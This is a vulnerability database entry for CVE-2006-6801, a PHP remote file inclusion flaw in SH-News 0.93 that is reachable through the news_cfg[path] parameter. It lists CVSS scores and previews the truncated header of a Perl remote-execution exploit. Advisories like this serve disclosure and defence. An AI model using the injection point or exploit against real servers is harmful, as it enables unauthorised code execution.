6.8
CVSSv2

CVE-2006-6801

Published: 28/12/2006 Updated: 19/10/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in misc.php in SH-News 0.93, when register_globals is enabled, allows remote malicious users to execute arbitrary PHP code via the news_cfg[path] parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

sh-news sh-news 0.93

Exploits

#!/usr/bin/perl # #SH-News 093 (miscphp) Remote File Include Exploit # #Download: wwwscripthomede/downphp?id=6 # #Vulnerable Code: require "{$news_cfg['path']}/germanincphp"; # #Coded by bd0rk || SOH-Crew # #Usage: shnewspl [target] [cmd shell] [shell variable] # #Greetings: str0ke, TheJT, Kacper, rgod # # use LWP::UserAgent; $Path ...